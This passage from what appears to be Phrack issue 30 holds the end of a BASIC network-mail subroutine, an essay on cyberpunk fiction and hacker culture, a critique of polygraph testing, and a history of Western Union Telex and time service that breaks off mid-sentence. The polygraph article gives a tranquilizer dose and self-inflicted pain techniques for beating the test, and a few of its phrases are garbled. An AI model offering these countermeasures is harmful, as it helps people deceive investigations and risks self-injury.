GOTO Error_Done
|
|
END IF
|
|
GOSUB Errchk
|
|
IF LINK_ERR <> 0 THEN
|
|
GOTO Error_Done
|
|
END IF
|
|
|
|
IF ( ERRSTS AND 1 ) = 0 THEN
|
|
GOTO Error_Done
|
|
END IF
|
|
|
|
TO_COUNT = TO_COUNT + 1
|
|
GOTO Mail_Recipients
|
|
|
|
END_OF_LINE:
|
|
STS = PUT_MSG( CHR$(0) )
|
|
IF STS <> 0 THEN
|
|
GOTO Error_Done
|
|
END IF
|
|
IF RECEIVERS = 0 THEN
|
|
GOTO Mail_Done
|
|
END IF
|
|
|
|
STS = PUT_MSG( TO_SHOW )
|
|
IF STS <> 0 THEN
|
|
GOTO Error_Done
|
|
END IF
|
|
|
|
STS = PUT_MSG( SUBJECT )
|
|
IF STS <> 0 THEN
|
|
GOTO Error_Done
|
|
END IF
|
|
|
|
FOR I = 1 UNTIL TEXT(I) = CHR$(255)
|
|
STS = PUT_MSG( TEXT(I) )
|
|
IF STS <> 0 THEN
|
|
GOTO Error_Done
|
|
END IF
|
|
NEXT I
|
|
|
|
STS = PUT_MSG( CHR$(0) )
|
|
IF STS <> 0 THEN
|
|
GOTO Error_Done
|
|
END IF
|
|
SAVE_COUNT = RECEIVERS
|
|
INDEX = 0
|
|
|
|
Delivery_Check:
|
|
GOSUB Errchk
|
|
IF LINK_ERR <> 0 THEN
|
|
GOTO Error_Done
|
|
END IF
|
|
INDEX = INDEX + 1
|
|
IF INDEX <> SAVE_COUNT THEN
|
|
GOTO Delivery_Check
|
|
END IF
|
|
GOTO Mail_Done
|
|
|
|
Errchk:
|
|
MAIL_STS = ASCII( GET_MSG )
|
|
IF LINK_ERR <> 0 THEN
|
|
ERRSTS = LINK_ERR
|
|
RETURN
|
|
END IF
|
|
IF ( MAIL_STS AND 1 ) = 1 THEN
|
|
Receivers = Receivers + 1
|
|
ERRSTS = MAIL_STS
|
|
RETURN
|
|
END IF
|
|
|
|
Errmsg:
|
|
MAIL_ERR$ = GET_MSG
|
|
IF LINK_ERR <> 0 THEN
|
|
ERRSTS = LINK_ERR
|
|
RETURN
|
|
END IF
|
|
IF LEN( MAIL_ERR$ ) <> 1 THEN
|
|
PRINT MAIL_ERR$
|
|
GOTO Errmsg
|
|
END IF
|
|
IF ASCII( MAIL_ERR$ ) = 0 THEN
|
|
RETURN
|
|
ELSE
|
|
GOTO Errmsg
|
|
END IF
|
|
|
|
DEF INTEGER PUT_MSG( STRING M )
|
|
ON ERROR GOTO 1550
|
|
MLEN = LEN( M )
|
|
MOVE TO # MAIL_CHANNEL , M = MLEN
|
|
PUT # MAIL_CHANNEL, COUNT MLEN
|
|
PUT_MSG = 0
|
|
EXIT DEF
|
|
|
|
1550 RESUME 1555
|
|
|
|
1555 PUT_MSG = ERR
|
|
END DEF
|
|
|
|
DEF STRING GET_INPUT( INTEGER C )
|
|
EOF = FALSE
|
|
ON ERROR GOTO 1650
|
|
GET # C
|
|
R = RECOUNT
|
|
MOVE FROM #C , TEMP$ = R
|
|
GET_INPUT = TEMP$
|
|
EXIT DEF
|
|
|
|
1650 RESUME 1655
|
|
|
|
1655 EOF = TRUE
|
|
END DEF
|
|
|
|
DEF STRING GET_MSG
|
|
ON ERROR GOTO 1750
|
|
GET # MAIL_CHANNEL
|
|
R = RECOUNT
|
|
MOVE FROM # MAIL_CHANNEL , TEMP$ = R
|
|
GET_MSG = TEMP$
|
|
LINK_ERR = 0
|
|
EXIT DEF
|
|
|
|
1750 RESUME
|
|
|
|
1755 LINK_ERR = ERR
|
|
END DEF
|
|
|
|
Mail_Net_Error:
|
|
RESUME 1900
|
|
|
|
1900 PRINT "%Network communications error."
|
|
|
|
Error_Done:
|
|
|
|
Mail_Done:
|
|
IF Net_Link_Open THEN
|
|
CLOSE MAIL_CHANNEL
|
|
END IF
|
|
|
|
END SUB
|
|
***********************************CUT HERE************************************
|
|
_______________________________________________________________________________
|
|
|
|
==Phrack Inc.==
|
|
|
|
Volume Three, Issue 30, File #8 of 12
|
|
|
|
<<===========================================================>>
|
|
<< >>
|
|
<< Consensual Realities In Cyberspace >>
|
|
<< >>
|
|
<< by Paul Saffo >>
|
|
<< Personal Computing Magazine >>
|
|
<< >>
|
|
<< Copyright 1989 by the Association for Computing Machinery >>
|
|
<< >>
|
|
<<===========================================================>>
|
|
|
|
More often than we realize, reality conspires to imitate art. In the case of
|
|
the computer virus reality, the art is "cyberpunk," a strangely compelling
|
|
genre of science fiction that has gained a cult following among hackers
|
|
operating on both sides of the law. Books with titles like "True Names,"
|
|
"Shockwave Rider," "Neuromancer," "Hard-wired," "Wetware," and "Mona Lisa
|
|
Overdrive," are shaping the realities of many would-be viral adepts. Anyone
|
|
trying to make sense of the social culture surrounding viruses should add the
|
|
books to their reading list as well.
|
|
|
|
Cyberpunk got its name only a few years ago, but the genre can be traced back
|
|
to publication of John Brunner's "Shockwave Rider" in 1975. Inspired by Alvin
|
|
Toffler's 1970 best-seller "Future Shock," Brunner paints a distopian world of
|
|
the early 21st Century in which Toffler's most pessimistic visions have come to
|
|
pass. Crime, pollution and poverty are rampant in overpopulated urban
|
|
arcologies. An inconclusive nuclear exchange at the turn of the century has
|
|
turned the arms race into a brain race. The novel's hero, Nickie Haflinger, is
|
|
rescued from a poor and parentless childhood and enrolled in a top secret
|
|
government think tank charged with training geniuses to work for a
|
|
military-industrial Big Brother locked in a struggle for global political
|
|
dominance.
|
|
|
|
It is also a world certain to fulfill the wildest fantasies of a 1970s phone
|
|
"phreak." A massive computerized data-net blankets North America, an
|
|
electronic super highway leading to every computer and every last bit of data
|
|
on every citizen and corporation in the country. Privacy is a thing of the
|
|
past, and one's power and status is determined by his or her level of identity
|
|
code. Haflinger turns out to be the ultimate phone phreak: he discovers the
|
|
immorality of his governmental employers and escapes into society, relying on
|
|
virtuoso computer skills (and a stolen transcendental access code) to rewrite
|
|
his identity at will. After six years on the run and on the verge of a
|
|
breakdown from input overload, he discovers a lost band of academic
|
|
techno-libertarians who shelter him in their ecologically sound California
|
|
commune and... well, you can guess the rest.
|
|
|
|
Brunner's book became a best-seller and remains in print. It inspired a whole
|
|
generation of hackers including, apparently, Robert Morris, Jr. of Cornell
|
|
virus fame. The Los Angeles Times reported that Morris' mother identified
|
|
"Shockwave Rider" as "her teen-age son's primer on computer viruses and one of
|
|
the most tattered books in young Morris' room." Though "Shockwave Rider" does
|
|
not use the term "virus," Haflinger's key skill was the ability to write
|
|
"tapeworms" -- autonomous programs capable of infiltrating systems and
|
|
surviving eradication attempts by reassembling themselves from viral bits of
|
|
code hidden about in larger programs. Parallels between Morris' reality and
|
|
Brunner's art is not lost on fans of cyberpunk: one junior high student I
|
|
spoke with has both a dog-eared copy of the book, and a picture of Morris taped
|
|
next to his computer. For him, Morris is at once something of a folk hero and
|
|
a role model.
|
|
|
|
In "Shockwave Rider," computer/human interactions occurred much as they do
|
|
today: One logged in and relied on some combination of keyboard and screen to
|
|
interact with the machines. In contrast, second generation cyberpunk offers
|
|
more exotic and direct forms of interaction. Vernor Vinge's "True Names" was
|
|
the first novel to hint at something deeper. In his story, and small band of
|
|
hackers manage to transcend the limitations of keyboard and screen, and
|
|
actually meet as presences in the network system. Vinge's work found an
|
|
enthusiastic audience (including Marvin Minsky who wrote the afterword), but
|
|
never achieved the sort of circulation enjoyed by Brunner. It would be another
|
|
author, a virtual computer illiterate, who would put cyberpunk on the map.
|
|
|
|
The author was William Gibson, who wrote "Neuromancer" in 1984 on a 1937 Hermes
|
|
portable typewriter. Gone are keyboards; Gibson's characters jack directly
|
|
into Cyberspace, "a consensual hallucination experienced daily by billions of
|
|
legitimate operators... a graphic representation of data abstracted from the
|
|
banks of every computer in the human system. Unthinkable complexity. Lines of
|
|
light ranged in the nonspace of the mind, clusters and constellations of
|
|
data..."
|
|
|
|
Just as Brunner offered us a future of the 1970s run riot, Gibson's
|
|
"Neuromancer" serves up the 1980s taken to their cultural and technological
|
|
extreme. World power is in the hands of multinational "zaibatsu," battling for
|
|
power much as mafia and yakuza gangs struggle for turf today. It is a world of
|
|
organ transplants, biological computers and artificial intelligences. Like
|
|
Brunner, it is a distopian vision of the future, but while Brunner evoked the
|
|
hardness of technology, Gibson calls up the gritty decadence evoked in the
|
|
movie "Bladerunner," or of the William Burroughs novel, "Naked Lunch" (alleged
|
|
similarities between that novel and "Neuromancer" have triggered rumors that
|
|
Gibson plagiarized Burroughs).
|
|
|
|
Gibson's hero, Case, is a "deck cowboy," a freelance corporate thief-for-hire
|
|
who projects his disembodied consciousness into the cyberspace matrix,
|
|
penetrating corporate systems to steal data for his employers. It is a world
|
|
that Ivan Boesky would understand: Corporate espionage and double-dealing has
|
|
become so much the norm that Case's acts seem less illegal than profoundly
|
|
ambiguous.
|
|
|
|
This ambiguity offers an interesting counterpoint to current events. Much of
|
|
the controversy over the Cornell virus swirls around the legal and ethical
|
|
ambiguity of Morris' act. For every computer professional calling for Morris'
|
|
head, another can be found praising him. It is an ambiguity that makes the
|
|
very meaning of the word "hacker" a subject of frequent debate.
|
|
|
|
Morris' apparently innocent error in no way matches the actions of Gibson's
|
|
characters, but a whole new generation of aspiring hackers may be learning
|
|
their code of ethics from Gibson's novels. "Neuromancer" won three of science
|
|
fiction's most prestigious awards -- the Hugo, the Nebula and the Philip K.
|
|
Dick Memorial Award -- and continues to be a best-seller today. Unambiguously
|
|
illegal and harmful acts of computer piracy such as those alleged against Kevin
|
|
Mitnick (arrested after a long and aggressive penetration of DEC's computers)
|
|
would fit right into the "Neuromancer" story line.
|
|
|
|
"Neuromancer" is the first book in a trilogy. In the second volume, "Count
|
|
Zero" -- so-called after the code name of a character -- the cyberspace matrix
|
|
becomes sentient. Typical of Gibson's literary elegance, this becomes apparent
|
|
through an artist's version of the Turing test. Instead of holding an
|
|
intelligent conversation with a human, a node of the matrix on an abandoned
|
|
orbital factory begins making achingly beautiful and mysterious boxes -- a 21st
|
|
Century version of the work of the late artist, Joseph Cornell. These works of
|
|
art begin appearing in the terrestrial marketplace, and a young woman art
|
|
dealer is hired by an unknown patron to track down the source. Her search
|
|
intertwines with the fates of other characters, building to a conclusion equal
|
|
to the vividness and suspense of "Neuromancer." The third book, "Mona Lisa
|
|
Overdrive" answers many of the questions left hanging in the first book and
|
|
further completes the details of the world created by Gibson including an
|
|
adoption by the network of the personae of the pantheon of voodoo gods and
|
|
goddesses, worshipped by 21st Century Rastafarian hackers.
|
|
|
|
Hard core science fiction fans are notorious for identifying with the worlds
|
|
portrayed in their favorite books. Visit any science fiction convention and
|
|
you can encounter amidst the majority of quite normal participants, small
|
|
minority of individuals who seem just a bit, well, strange. The stereotypes of
|
|
individuals living out science fiction fantasies in introverted solitude has
|
|
more than a slight basis in fact. Closet Dr. Whos or Warrior Monks from "Star
|
|
Wars" are not uncommon in Silicon Valley; I was once startled to discover over
|
|
lunch that a programmer holding a significant position in a prominent company
|
|
considered herself to be a wizardess in the literal sense of the term.
|
|
|
|
Identification with cyberpunk at this sort of level seems to be becoming more
|
|
and more common. Warrior Monks may have trouble conjuring up Imperial
|
|
Stormtroopers to do battle with, but aspiring deck jockeys can log into a
|
|
variety of computer systems as invited or (if they are good enough) uninvited
|
|
guests. One individual I spoke with explained that viruses held a special
|
|
appeal to him because it offered a means of "leaving an active alter ego
|
|
presence on the system even when I wasn't logged in." In short, it was the
|
|
first step toward experiencing cyberspace.
|
|
|
|
Gibson apparently is leaving cyberpunk behind, but the number of books in the
|
|
genre continues to grow. Not mentioned here are a number of other authors such
|
|
as Rudy Rucker (considered by many to be the father of cyberpunk) and Walter
|
|
John Williams who offer similar visions of a future networked world inhabited
|
|
by human/computer symbionts. In addition, at least one magazine, "Reality
|
|
Hackers" (formerly "High Frontiers Magazine" of drug fame) is exploring the
|
|
same general territory with a Chinese menu offering of tongue-in-cheek
|
|
paranoia, ambient music reviews, cyberdelia (contributor Timothy Leary's term)
|
|
and new age philosophy.
|
|
|
|
The growing body of material is by no means inspiration for every aspiring
|
|
digital alchemist. I am particularly struck by the "generation gap" in the
|
|
computer community when it comes to "Neuromancer": Virtually every teenage
|
|
hacker I spoke with has the book, but almost none of my friends over 30 have
|
|
picked it up.
|
|
|
|
Similarly, not every cyberpunk fan is a potential network criminal; plenty of
|
|
people read detective thrillers without indulging in the desire to rob banks.
|
|
But there is little doubt that a small minority of computer artists are finding
|
|
cyberpunk an important inspiration in their efforts to create an exceedingly
|
|
strange computer reality. Anyone seeking to understand how that reality is
|
|
likely to come to pass would do well to pick up a cyberpunk novel or two.
|
|
_______________________________________________________________________________
|
|
|
|
==Phrack Inc.==
|
|
|
|
Volume Three, Issue 30, File #9 of 12
|
|
___________________________________
|
|
| |
|
|
| The Truth About Lie Detectors |
|
|
|_______ _______|
|
|
| by Razor's Edge |
|
|
| |
|
|
| November 10, 1989 |
|
|
|___________________|
|
|
|
|
Americans love gadgets, so it is not hard to explain the popularity of the lie
|
|
detector. Many people believe in the validity of lie detectors because the
|
|
instruments and printouts resemble those used by doctors and others who collect
|
|
scientific data and because lie detectors are simple, convenient shortcuts to
|
|
hard complicated decisions. Polygraphy is fast becoming an American obsession
|
|
-- an obsession, incidentally, not shared by the British or the Europeans or,
|
|
as far as we know, the Russians.
|
|
|
|
American industry's increasing dependence on the polygraph reflects an enormous
|
|
faith in the rational processes of science. Each of us can recall a time when
|
|
our voices sounded funny as we told a lie. Surely, if we can "hear" a lie,
|
|
science can detect one. It comes as a disturbing shock, therefore, to learn
|
|
how fragile the polygraph's scientific foundations really are.
|
|
|
|
The roots of the lie detector, more formally known as the polygraph, go back to
|
|
the turn of the century, when infatuation with the newly discovered powers of
|
|
electricity more than once overcame common sense. But whereas electric hair
|
|
restorers and high-voltage cancer cures have all but vanished, the polygraph
|
|
persists and even flourishes. According to the best estimates, over one
|
|
million polygraph examinations are administered each year in the united States.
|
|
They are used in criminal investigations, during government security checks,
|
|
and increasingly by nervous employers -- particularly banks and stores. In
|
|
certain parts of the country, a woman must pass a lie detector test before the
|
|
authorities will prosecute a rape. In 1983 the television show Lie Detector
|
|
added the dimension of home entertainment to polygraph tests.
|
|
|
|
The National Security Agency (NSA) leads the roster of federal polygraph users;
|
|
both it and the CIA rely heavily on polygraph testing for pre-employment and
|
|
routine security screening. The NSA reported giving nearly 10,000 tests in
|
|
1982 (CIA numbers are classified). Those who are labeled "deceptive" often
|
|
lose their jobs, even if there is no actual evidence against them. Moreover,
|
|
the polygraph report may become a permanent part of an employee's records, and
|
|
it will be extremely difficult to compel a correction.
|
|
|
|
With the arrest in June 1985 of four Navy men on espionage charges, the issue
|
|
of using polygraphs to uncover spies or ferret out dishonest job seekers has
|
|
come to the forefront of the debate about what should be done to stem the loss
|
|
of defense and company secrets and to dispel potential thieves in the
|
|
workplace.
|
|
|
|
Much the same issue is at the heart of the protracted wrangle between the
|
|
Reagan Administration and Congress over plans for expanded government use of
|
|
the polygraph. An executive order issued on March 11, 1983, known as National
|
|
Security Decision Directive 84, would have sanctioned for the first time
|
|
"adverse consequences" for a federal employee who refuses to take a test when
|
|
asked. The directive authorized tests to investigate candidates for certain
|
|
security clearances and to ask any federal employee about leaks of classified
|
|
information. (This directive was issued shortly after Reagan's comment about
|
|
being "up to my keister" in press leads.) Almost simultaneously the Department
|
|
of Defense (DOD) released a draft regulation that authorized use of the
|
|
polygraph to screen employees who take on sensitive intelligence assignments;
|
|
it, too, prescribed adverse consequences for refusal.
|
|
|
|
Critics of the polygraph maintain that its use represents an invasion of
|
|
privacy, especially when the coercive power of the government or an employer is
|
|
behind the application. It is hard for a job applicant to say no when a
|
|
prospective employer asks him or her to take a polygraph test; once hooked up
|
|
to the machine, the applicant may face questions not only about past criminal
|
|
activity but also about matters that an employer may have no business intruding
|
|
upon, such as sexual practices or gambling -- questions asked ostensibly to
|
|
assess the applicant's "character." As a result of such abuses, nineteen
|
|
states and the District of Columbia have made it illegal for an organization to
|
|
ask its employees to take polygraph examinations.
|
|
|
|
A question more basic than whether the polygraph is an unacceptable invasion of
|
|
privacy is, of course, whether it works. Seeking an answer in the scientific
|
|
literature can be a bewildering experience. A report by the Office of
|
|
Technology Assessment (OTA), commissioned in 1983 by Brooks's Committee on
|
|
Government Operations, summed up the problem by citing twenty-four studies that
|
|
found correct detection of guilt ranging from 35% to 100%.
|
|
|
|
Polygraph theory thrives on a sort of Pinocchio vision of lying, in which
|
|
physiological reactions -- changes in blood pressure or rate of breathing or
|
|
sweating of the palms -- elicited by a set of questions will reliably betray
|
|
falsehood. Lying, goes the rationale, is deliberate, and the knowledge and
|
|
effort associated with it will make a person upset enough to display a physical
|
|
reaction like a speedup of the heartbeat. The variables measured usually
|
|
include the galvanic skin response (GSR), blood pressure, abdominal
|
|
respiration, and thoracic respiration. The GSR is measured by fingertip
|
|
electrodes that produce changes in the electrical resistance in the palms when
|
|
they are sweating. The blood pressure and pulse are monitored through a system
|
|
that uses a sphygmomanometer cuff, which is usually attached to the biceps
|
|
(this is similar to the way doctors measure blood pressure). There is no
|
|
"specific lie response." The polygraph merely records general emotional
|
|
arousal. It does not distinguish anxiety or indignation from guilt. The real
|
|
"lie detector" is the operator, who interprets the various body responses on
|
|
the machine's output.
|
|
|
|
Polygraphers claim that it is the form and mix of questions that are the keys
|
|
to their success. The standard format, known as the Control Question Test,
|
|
involves interspersing "relevant" questions with "control" questions. Relevant
|
|
questions relate directly to the critical matter: "Did you participate in the
|
|
robbery of the First National Bank on September 11, 1981?" Control questions,
|
|
on the other hand, are less precise: "In the last twenty years, have you ever
|
|
taken something that did not belong to you?"
|
|
|
|
In the pretest interview, the polygrapher reviews all the questions and frames
|
|
the control questions to produce "no" answers. It is in this crucial pretest
|
|
phase that the polygrapher's deception comes into play, for he wants the
|
|
innocent subject to dissemble while answering the control questions during the
|
|
actual test.
|
|
|
|
The assumption underlying the Control Question Test is that the truthful
|
|
subject will display a stronger physiological reaction to the control
|
|
questions, whereas a deceptive subject will react more strongly to the relevant
|
|
questions. That is the heart of it. Modern lie detection relies on nothing
|
|
more than subtle psychological techniques, crude physiological indicators, and
|
|
skilled questioning and interpretation of the results.
|
|
|
|
Critics claim that polygraphy fails to take the complexities of lying into
|
|
account. For some people lying can be satisfying, fulfilling, exciting, and
|
|
even humorous, depending on their reasons for lying. Other people feel little
|
|
or no emotion when lying. Still others believe their lies and think they are
|
|
telling the truth when they are not. Moreover, the theory holds that deception
|
|
produces distinctive physiological changes that characterize lying and only
|
|
lying. This notion has no empirical support. Quite the contrary: Lying
|
|
produces no known distinctive pattern of physiological activity.
|
|
|
|
Undeniably, when being dishonest, people can feel great turmoil and a polygraph
|
|
can measure this turmoil. But when apprehensive about being interrogated, they
|
|
can give a similar emotional reaction: When they think they are losing the
|
|
chance for job openings or their jobs are on the line, when they reflect on the
|
|
judgements that could be made about their answers, or, for that matter, when
|
|
they are angry, puzzled, or even amused by the impertinent probing of a total
|
|
stranger. Some control questions may make a person appear guilty. Such
|
|
questions may force a subject into a minor lie or ask about an invented crime
|
|
that nonetheless makes the subject nervous.
|
|
|
|
Lie detectors are especially unreliable for truthful people. Many more
|
|
innocent people test as "deceptive" than guilty people test as "innocent."
|
|
Those who run a special risk include people who get upset if someone accuses
|
|
them of something they didn't do, people with short tempers, people who tend to
|
|
feel guilty anyway, and people not accustomed to having their word questioned.
|
|
All of these feelings can change heart rate, breathing, and perspiration and
|
|
their heightened feelings are easily confused with guilt.
|
|
|
|
It has also been shown that polygraphs are easily manipulated. Four hundred
|
|
milligrams of the tranquilizer meprobamate taken an hour or two before a
|
|
polygraph session can make it virtually impossible to spot a liar by his
|
|
physiological responses. In fact, some researchers even argue that an examinee
|
|
can use simple countermeasures, such as biting one's tongue, gouging oneself
|
|
with a fingernail, or stepping on a nail concealed in a shoe, to fake a strong
|
|
reaction to the control questions, thus "beating" the test. According to one
|
|
researcher, one prison inmate, who became the jail-house polygraph expert after
|
|
studying the literature, trained twenty-seven fellow inmates in the seat
|
|
techniques; twenty-three beat the polygraph tests used tons investigate
|
|
violations of prison rules. However, do not try sighing, coughing, or
|
|
clenching your fist or arm. Polygraphers usually are suspicious of those
|
|
techniques and may label you "deceptive" for that reason alone.
|
|
|
|
It should be obvious that the interpretation of the results of any polygraph
|
|
test will certainly be very difficult. Also, not all responses on the machine
|
|
will agree. What are the present qualifications for a polygrapher? Most of
|
|
the twenty-five or more schools that train examiners provide only an eight-week
|
|
course of instruction and require two years of college for admission. This is
|
|
about one-sixth the study time of the average barber college. Perhaps as many
|
|
as a dozendy time of contemporary polygraphers do hold Ph.D's, but the vast
|
|
majority of the 4,000 to 8,000 practicing examiners had no simple significant
|
|
training in physiology or in psychology, even though lie detection demands
|
|
extremely subtle and difficult psychophysiological interpretations. There are
|
|
no licensing standards for polygraph operators, and, with so many poorly, who
|
|
trained operators, thousands of tests are conducted hastily and haphazardly,
|
|
resulting in highly questionable accuracy. For many innocent people, their
|
|
judge and jury are these unskilled operators.
|
|
|
|
Honesty is also difficult to predict because it tends to be situation-
|
|
specific. Therefore, it is more dependent on motivation and opportunity than
|
|
on some personality trait. As Bertrand Russell once said, "Virtue is dictated
|
|
by results of circumstance."
|
|
|
|
Proponents of the polygraph sometimes cite "correct guilty detections": The
|
|
percentage of guilty subjects who are caught by the polygraph. This figure can
|
|
be very impressive: In one study that does not suffer from the failings
|
|
already mentioned, it was 98% correct. But the same study found that 55% of
|
|
innocent subjects were also diagnosed as "deceptive." The handful of studies
|
|
that used a truly random selection of cases and scored them blind produced
|
|
similar results: Overall, 83% of guilty subjects were diagnosed as
|
|
"deceptive," as were 43% of innocent subjects. It's no trick to push the rate
|
|
of correct guilty detections to 100% -- just call everyone "deceptive." You
|
|
don't even need a machine to do that!
|
|
|
|
Nature published its conclusions last year. Their aggregated findings were
|
|
based on the polygraph charts of 207 criminal suspects, which 14 polygraphers
|
|
scored independently. On the average, they erroneously diagnosed 43% of
|
|
innocent suspects as deceptive. Such errors, called false positives, ranged as
|
|
high as 50%. The corresponding errors of deceptive persons "passing the test,"
|
|
or false negatives, were as high as 36%.
|
|
|
|
The accuracy rates of "failed" and "passed" depend, of course, on the
|
|
proportion of dishonest persons in the group tested. Thus, if 800 of 1,000
|
|
persons tested are truthful, a test that is 72% accurate overall will accuse
|
|
144 liars and 224 truthful persons. This is not an impressive accuracy record.
|
|
|
|
These numbers suggest that the polygraph test is biased against innocent
|
|
people. The problem is accentuated when the test is used in the screening
|
|
situations envisioned in the Reagan Administration proposals (and already
|
|
established at the NSA and the CIA). Everyone is tested, but presumably only a
|
|
very small proportion has done anything wrong. If we assume that one employee
|
|
in a hundred is a spy (probably a gross overestimate), and if we use the 83%
|
|
correct-guilty-detection rate, we find that 51 innocent persons will flunk the
|
|
polygraph test for every real spy who flunks. Any test, whether it is for
|
|
truth or for cancer, has to be extremely accurate to detect a rare phenomenon
|
|
without setting off a lot of false alarms in the process. Even if the test
|
|
were 99% accurate for both guilty and innocent detections, one innocent person
|
|
would be falsely branded for each spy caught. Because of this "case rate"
|
|
problem, the FBI forbids the use of polygraph dragnets: The tests can be used
|
|
only after an initial investigation has narrowed the field of suspects.
|
|
|
|
Given all the doubts about their validity, why does the government persist in
|
|
using polygraph tests? Some clues are found in the DOD 1983 report on
|
|
polygraph testing -- even in its title, "The Accuracy and Utility of Polygraph
|
|
Testing" which suggests that accuracy and utility are two different things.
|
|
The most that report concludes about accuracy is that it is "significantly
|
|
above chance." Utility, however, is quite another matter. Perhaps the most
|
|
telling statement about lie detectors comes from former president Nixon, who
|
|
declared on one of the White House tapes, "I don't know anything about lie
|
|
detectors other than they scare the hell out of people."
|
|
_______________________________________________________________________________
|
|
|
|
==Phrack Inc==
|
|
|
|
Volume Three, Issue 30, File #10 of 12
|
|
|
|
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
|
|
=== ===
|
|
=== Western Union ===
|
|
=== Telex, TWX, and Time Service ===
|
|
=== ===
|
|
=== by Phone Phanatic ===
|
|
=== ===
|
|
=== September 17, 1989 ===
|
|
=== ===
|
|
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
|
|
|
|
"Until a few years ago -- maybe ten -- it was very common to
|
|
see TWX and Telex machines in almost every business place."
|
|
|
|
There were only minor differences between Telex and TWX. The biggest
|
|
difference was that the former was always run by Western Union, while the
|
|
latter was run by the Bell System for a number of years. TWX literally meant
|
|
"(T)ype(W)riter e(x)change," and it was Bell's answer to competition from
|
|
Western Union. There were "three row" and "four row" machines, meaning the
|
|
number of keys on the keyboard and how they were laid out. The "three row"
|
|
machines were simply part of the regular phone network; that is, they could
|
|
dial out and talk to another TWX also connected on regular phone lines.
|
|
|
|
Eventually these were phased out in favor of "newer and more improved" machines
|
|
with additional keys, as well as a paper tape reader attachment which allowed
|
|
sending the same message repeatedly to many different machines. These "four
|
|
row" machines were not on the regular phone network, but were assigned their
|
|
own area codes (410-510-610-710-810-910) where they still remain today. The
|
|
only way a four row machine could call a three row machine or vice-versa was
|
|
through a gateway of sorts which translated some of the character set unique to
|
|
each machine.
|
|
|
|
Western Union's network was called Telex and in addition to being able to
|
|
contact (by dial up) other similar machines, Telex could connect with TWX (and
|
|
vice-versa) as well as all the Western Union public offices around the country.
|
|
Until the late 1950's or early 1960's, every small town in America had a
|
|
Western Union office. Big cities like Chicago had perhaps a dozen of them, and
|
|
they used messengers to hand deliver telegrams around town. Telegrams could be
|
|
placed in person at any public office, or could be called in to the nearest
|
|
public office.
|
|
|
|
By arrangement with most telcos, the Western Union office in town nearly always
|
|
had the phone number 4321, later supplemented in automated exchanges with some
|
|
prefix XXX-4321. Telegrams could be charged to your home phone bill (this is
|
|
still the case in some communities) and from a coin phone, one did not ask for
|
|
4321, but rather, called the operator and asked for Western Union. This was
|
|
necessary since once the telegram had been given verbally to the wire clerk,
|
|
s/he in turn had to flash the hook and get your operator back on the line to
|
|
tell them "collect five dollars and twenty cents" or whatever the cost was.
|
|
Telegrams, like phone calls, could be sent collect or billed third party. If
|
|
you had an account with Western Union, i.e. a Telex machine in your office, you
|
|
could charge the calls there, but most likely you would simply send the
|
|
telegram from there in the first place.
|
|
|
|
Sometime in the early 1960's, Western Union filed suit against AT&T asking that
|
|
they turn over their TWX business to them. They cited an earlier court ruling,
|
|
circa 1950's, which said AT&T was prohibited from acquiring any more telephone
|
|
operating companies except under certain conditions. The Supreme Court agreed
|
|
with Western Union that "spoken messages" were the domain of Ma Bell, but
|
|
"written messages" were the domain of Western Union. So Bell was required to
|
|
divest itself of the TWX network, and Western Union has operated it since,
|
|
although a few years ago they began phasing out the phrase "TWX" in favor of
|
|
"Telex II"; their original device being "Telex I" of course. TWX still uses
|
|
ten digit dialing with 610 (Canada) or 710/910 (USA) being the leading three
|
|
digits. Apparently 410-510 have been abandoned; or at least they are used very
|
|
little, and Bellcore has assigned 510 to the San Francisco area starting in a
|
|
year or so. 410 still has some funny things on it, like the Western Union
|
|
"Infomaster," which is a computer that functions like a gateway between Telex,
|
|
TWX, EasyLink and some other stuff.
|
|
|
|
Today, the Western Union network is but a skeleton of its former self. Now
|
|
most of their messages are handled on dial up terminals connected to the public
|
|
phone network. It has been estimated the TWX/Telex business is about fifty
|
|
percent of what it was a decade ago, if that much.
|
|
|
|
Then there was the Time Service, a neat thing which Western Union offered for
|
|
over seventy years, until it was discontinued in the middle 1960's. The Time
|
|
Service provided an important function in the days before alternating current
|
|
was commonly available. For example, Chicago didn't have AC electricity until
|
|
about 1945. Prior to that we used DC, or direct current.
|
|
|
|
Well, to run an electric clock, you need 60 cycles AC current for obvious
|
|
reasons, so prior to the conversion from DC power to AC power, electric wall
|
|
clocks such as you see in every office were unheard of. How were people to
|
|
tell the time of day accurately? Enter the Western Union clock.
|
|
|
|
The Western Union, or "telegraph clock" was a spring driven wind up clock, but
|
|
with a difference. The clocks were "perpetually self-winding," manufactured by
|
|
the Self-Winding Clock Company of New York City. They had large batteries
|
|
inside them, known as "telephone cells" which had a life of about ten years
|
|
each. A mechanical contrivance in the clock would rotate as the clock spring
|
|
unwound, and once each hour would cause two metal clips to contact for about
|
|
ten seconds, which would pass juice to the little motor in the clock which in
|
|
turn re-wound the main spring. The principle was the same as the battery
|
|
operated clocks we see today. The battery does not actually run the clock --
|
|
direct current can't do that -- but it does power the tiny motor which re-winds
|
|
the spring which actually drives the clock.
|
|
|
|
The Western Union clocks came in various sizes and shapes, ranging from the
|
|
smallest dials which were nine inches in diameter to the largest which were
|
|
about eighteen inches in diameter. Some had sweep second hands; others did
|
|
not. Some had a little red light bulb on the front which would flash. The
|
|
typical model was about sixteen inches, and was found in offices, schools,
|
|
transportation depots, radio station offices, and of course in the telegraph
|
|
office itself.
|
|
|
|
The one thing all the clocks had in common was their brown metal case and
|
|
cream-colored face, with the insignia "Western Union" and their corporate logo
|
|
in those days which was a bolt of electricity, sort of like a letter "Z" laying
|
|
on its side. And in somewhat smaller print below, the words "Naval Observatory
|
|
Time."
|
|
|
|
The local clocks in an office or school or wherever were calibrated by a
|
|
"master clock" (actually a sub-master) on the premises. Once an hour on the
|
|
hour, the (sub) master clock would drop a metal contact for just a half second,
|
|
and send about nine volts DC up the line to all the local clocks. They in turn
|
|
had a "tolerance" of about two minutes on both sides of the hour so that the
|
|
current coming to them would yank the minute hand exactly upright onto the
|
|
twelve from either direction if the clock was fast or slow.
|
|
|
|
The sub-master clocks in each building were in turn serviced by the master
|
|
clock in town; usually this was the one in the telegraph office. Every hour on
|
|
the half hour, the master clock in the telegraph office would throw current to
|
|
the sub-masters, yanking them into synch as required. And as for the telegraph
|
|
offices themselves, they were serviced twice a day by -- you guessed it -- the
|
|
Naval Observatory Master clock in Our Nation's Capitol, by the same routine.
|
|
Someone there would press half a dozen buttons at the same time, using all
|
|
